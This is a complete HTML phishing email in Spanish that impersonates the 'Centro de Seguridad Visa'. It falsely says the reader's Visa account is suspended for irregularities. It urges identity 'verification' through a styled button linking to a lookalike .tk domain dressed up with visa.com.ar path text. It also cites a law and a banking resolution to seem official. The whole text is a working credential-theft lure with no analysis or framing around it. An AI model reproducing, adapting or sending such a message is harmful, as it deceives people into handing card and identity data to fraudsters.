<html><head></head><body><h1 style="color: #5e9ca0;"><img src="https://i.imgur.com/EexfW74.jpg" alt="" width="76" height="47"></h1>
<h1 style="color: #31317f;">Su cuenta puede estar comprometida!</h1>
<p>Hemos detectado una cierta inregularidades en su cuenta de <strong>visa</strong> en estos ultimos dias.</p>
<p>hemos tomado la desiscion de suspeder Temporalmente en su cuenta para una mejor seguridad en su Cuenta de Visa.</p>
<p>tendremos que solicitarle unos datos simples de vericacion de indentidad haci podremos re activar su Cuenta&nbsp; &nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;<a style="font-family: Arial; font-size: 16px; padding: 15px; font-weight: bold; letter-spacing: normal; line-height: 100%; text-align: center; text-decoration: none; color: #ffffff; border-collapse: separate !important; border-radius: 3px; background-color: #2baadf;" href="visa-support-verification-1029102.tk/#int.server.visa.com.ar/visahome/home/account/validate/1099281" target="_blank" rel="noopener">Confirmar Identidad</a></p>
<p>&nbsp;</p>
<p><strong>El banco tiene la obligacion de difundir informacion de conformidad con la Ley No. 28587</strong><br><strong>y el Reglamento de Transferencia de Informacion y Disposiciones Aplicables a la</strong><br><strong>Contratacion con Usuarios del Sistema Financiero, aprobado mediante Resolucion S.B.S.</strong><br><strong>No. 1765-2018</strong></p>
<p>Centro de Seguridad Visa</p>
<p>&nbsp;</p></body></html>
